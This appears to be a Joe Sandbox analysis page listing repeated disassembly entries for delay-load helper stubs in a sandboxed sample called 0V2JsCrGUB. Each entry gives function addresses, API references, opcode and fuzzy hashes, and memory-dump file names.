Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 5
API String ID: 1269201914-3411284777
Opcode ID: 3d77803bcc9d5e9ef41ceb36e939e6568395283d3ca297c8a915d8d599fd437c
Instruction ID: 88b3043115365b570d164e22b8fb328ca83a15348623e71aaec50a2b1dc10bc4
Opcode Fuzzy Hash: 3d77803bcc9d5e9ef41ceb36e939e6568395283d3ca297c8a915d8d599fd437c
Instruction Fuzzy Hash: 7EB012D92AC100BC320F618A9E02C37010DC1C2F22330803FFC19C8490D8446F080531

Function 0035E1D1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E1E3

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

5, xrefs: 0035E1DD

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 5
API String ID: 1269201914-3411284777
Opcode ID: 10934f890d0a9fa5294f697bb1aec66b0cdfc462f62340ffbcaa965323f5598e
Instruction ID: eafb3be3a1fecc59a52fca3e52df99188ee529e5bc1186f90b2331a17d8f009c
Opcode Fuzzy Hash: 10934f890d0a9fa5294f697bb1aec66b0cdfc462f62340ffbcaa965323f5598e
Instruction Fuzzy Hash: 3FB012D92A8100BC320F21869E02C37010DC1C3F22330C43FFC15C8890D844AF090431

Function 0035E232 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E1E3

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

5, xrefs: 0035E1DD

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 5
API String ID: 1269201914-3411284777
Opcode ID: 66100247a743e72a7bc586e8acddba97461d71f15f70313c82a85d8651752999
Instruction ID: 8855963430dee4957c61d8f8401d290c5ef9ea8dae94ebb7d64906d5f3cd85b0
Opcode Fuzzy Hash: 66100247a743e72a7bc586e8acddba97461d71f15f70313c82a85d8651752999
Instruction Fuzzy Hash: 42B012E5368000BC320F61469F03C37010DC1C2F22330803FFC1AC8490DC416F090431

Function 0035E23C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E1E3

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

5, xrefs: 0035E1DD

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 5
API String ID: 1269201914-3411284777
Opcode ID: 5522e8b8826301b06e9ea38b6c3330b526dc05d3b10309830e14851937926c2a
Instruction ID: 0ca574791abb8e78239310cffa80078d440124bd7c36ab845b8eb2919f08cd37
Opcode Fuzzy Hash: 5522e8b8826301b06e9ea38b6c3330b526dc05d3b10309830e14851937926c2a
Instruction Fuzzy Hash: F9B012E5268000BC320F61479E02C37410DC1C2F22330803FFC19C8490D8406F080431

Function 0035E228 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E1E3

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

5, xrefs: 0035E1DD

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 5
API String ID: 1269201914-3411284777
Opcode ID: 4213e6cdb17f5e894175ed6975664c3954c60df5b6b0b9b9bc8d2889fa2d6786
Instruction ID: 6c454d97d9250319df86c6c85ae2e1a526d9afe862a1d2a1c34b9d585d9e9abc
Opcode Fuzzy Hash: 4213e6cdb17f5e894175ed6975664c3954c60df5b6b0b9b9bc8d2889fa2d6786
Instruction Fuzzy Hash: 4AB012E5268100BC324F61469E02C37010DC1C2F22330813FFC29C8490D8416F480431

Function 0035E21E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E1E3

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

5, xrefs: 0035E1DD

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 5
API String ID: 1269201914-3411284777
Opcode ID: d010929793b2d60dacfa0f188e77de0acd3ccf67b08e3c7b72bb6b57f5d202d3
Instruction ID: 2db07de4cb2995cba10eb0159106b218901504ee0211bee46d8198deb24c572a
Opcode Fuzzy Hash: d010929793b2d60dacfa0f188e77de0acd3ccf67b08e3c7b72bb6b57f5d202d3
Instruction Fuzzy Hash: AFB012E5268000BC320F61469E02C37010DC1C3F22330C03FFC19C8490D840AF090431

Function 0035E200 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E1E3

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

5, xrefs: 0035E1DD

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 5
API String ID: 1269201914-3411284777
Opcode ID: f9f6dd7fa1a836a5481464eaa9f21ef65a1a0b7f46bd9cc93b7aaf74e0659095
Instruction ID: 873b4269a8008df02b16651fbf0009ef85f42842fad49bdc1293f59939f7af06
Opcode Fuzzy Hash: f9f6dd7fa1a836a5481464eaa9f21ef65a1a0b7f46bd9cc93b7aaf74e0659095
Instruction Fuzzy Hash: 3DB012D5368140BC324F62469E02C37020DC5C2F22330C13FFC19C8690D8406F4C0431

Function 0035E20A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E1E3

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

5, xrefs: 0035E1DD, 0035E20A

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 5
API String ID: 1269201914-3411284777
Opcode ID: 6f56e4f7160c1aad8e23dec63f8cd8c671b47365a9d293442d662ad384d492ae
Instruction ID: 9207c422daf2ff686c22d9154fcd346c302de52c52f53e886c42b66972cdd3dc
Opcode Fuzzy Hash: 6f56e4f7160c1aad8e23dec63f8cd8c671b47365a9d293442d662ad384d492ae
Instruction Fuzzy Hash: 31B092D52A8000AC220A62469A02C36020DC582B22320802EFC19C869098516B0D0431

Function 0035E264 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E1E3

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

5, xrefs: 0035E1DD

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 5
API String ID: 1269201914-3411284777
Opcode ID: af870e8ba82cb214bb671a59a8a05bade5ed69a852d05374b8972f0764fed885
Instruction ID: b038c9c2ba258f030ec01553bb982493bc963b9ce5d769777bbe78db9325e1a8
Opcode Fuzzy Hash: af870e8ba82cb214bb671a59a8a05bade5ed69a852d05374b8972f0764fed885
Instruction Fuzzy Hash: CFB012D5279040BC324F62469E02C37014EC5C2F22330803FFC1AC8490D8406F080432

Function 0035E26E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E1E3

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

5, xrefs: 0035E1DD

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 5
API String ID: 1269201914-3411284777
Opcode ID: c72f7a431bf8b1b76fb01b2cf843229ed04efaea11aa05e35e2e60d95337c0c4
Instruction ID: 2327e6e49b67fed8462a0f7af6744bdb5e7f458da6614e4c42ce1bf433f1853f
Opcode Fuzzy Hash: c72f7a431bf8b1b76fb01b2cf843229ed04efaea11aa05e35e2e60d95337c0c4
Instruction Fuzzy Hash: 50B012D526C000BC320F61969E02C37014DC1C3F22330C03FFC19C8490D840AF090431

Function 0035E250 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E1E3

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

5, xrefs: 0035E1DD

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 5
API String ID: 1269201914-3411284777
Opcode ID: 62e2bd8aafb246084ae5e36169128dc4b5a7d9168edb39f9a6a3a221f7a9e638
Instruction ID: 8d382f0d41029c65381e096023639ae91e65eb6e11f2bbe542835d227e8bcda7
Opcode Fuzzy Hash: 62e2bd8aafb246084ae5e36169128dc4b5a7d9168edb39f9a6a3a221f7a9e638
Instruction Fuzzy Hash: 71B012E9269140BC328F63469E02C37010EC1C2F22330813FFC19C8490D8406F4C0432

Function 0035E246 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E1E3

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

5, xrefs: 0035E1DD

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 5
API String ID: 1269201914-3411284777
Opcode ID: c8b36b416504067ebb48ce3371b9a0bdd1a0c288edf0c2f017cef12734f7cd2c
Instruction ID: 5a041c838b16480aac8ae208eeaac46f530cb2b5640f9ffd4372f6d27ce1b0ee
Opcode Fuzzy Hash: c8b36b416504067ebb48ce3371b9a0bdd1a0c288edf0c2f017cef12734f7cd2c
Instruction Fuzzy Hash: B8B012D5269040BC324F62469E02C37010EC1C3F22330C03FFC19C8490D840AF091432

Function 0035E282 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E1E3

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

5, xrefs: 0035E1DD

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 5
API String ID: 1269201914-3411284777
Opcode ID: 23848e548be97d335fd99cd5c0d0c23926008f9eb46f85fdf576a49072c44b15
Instruction ID: 58d088a69dcdc96f63b3b37bb362b932ab32df2689c98db9f12524a51b4982a6
Opcode Fuzzy Hash: 23848e548be97d335fd99cd5c0d0c23926008f9eb46f85fdf576a49072c44b15
Instruction Fuzzy Hash: E3B092E5268000AC220E61869A02C36018DC182B22320803EFC19C849098416B090431

Function 0035EAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035EAF9

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

3Oo, xrefs: 0035EAE7, 0035EAF3

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3Oo
API String ID: 1269201914-2812179900
Opcode ID: 7f3f15839fbc5ae95bd88a59dc53b5c4137067e2fc447974bcde2904ede9e83d
Instruction ID: 289e09847a50bdbd228c8187c3b02dcc4710bb58c59d26769aa186e701e1f5dd
Opcode Fuzzy Hash: 7f3f15839fbc5ae95bd88a59dc53b5c4137067e2fc447974bcde2904ede9e83d
Instruction Fuzzy Hash: 94B012CE2AA1427C311FA3105D43C37010CD5C1F92330E02FFC25C84A1DC801E090832

Function 0035E50D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E51F

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

PDu<5, xrefs: 0035E519

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: PDu<5
API String ID: 1269201914-1466653219
Opcode ID: fdd58ac85087eee0a16064bc531ff75851afff6a33590c5d169d3cd66514fdfe
Instruction ID: de80160b07f77cf20d1f49b7b73ee646d4393a2b29371d5618df086425132ec6
Opcode Fuzzy Hash: fdd58ac85087eee0a16064bc531ff75851afff6a33590c5d169d3cd66514fdfe
Instruction Fuzzy Hash: BBB012DA2680407C310F51745C06D3B010CC1C3F12330943FFC65D4891B8404F0C0431

Function 0035E546 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E51F

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

PDu<5, xrefs: 0035E519, 0035E546

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: PDu<5
API String ID: 1269201914-1466653219
Opcode ID: 1ae508a20fdf6cb8640dabd3acedc4247d772f2383d8f2845e94cc70fdbbc8e2
Instruction ID: a6e9a3f440f5f99fae6df873cd991cc9f7bf2d2e1fef35ed8659c10efd89070a
Opcode Fuzzy Hash: 1ae508a20fdf6cb8640dabd3acedc4247d772f2383d8f2845e94cc70fdbbc8e2
Instruction Fuzzy Hash: 98B012DA2685407C320F91189C03D3B010CC1C3F12330962FFC19C4490F8404E4C0431

Function 0035E5B1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E580

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

Fjun5, xrefs: 0035E57A

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
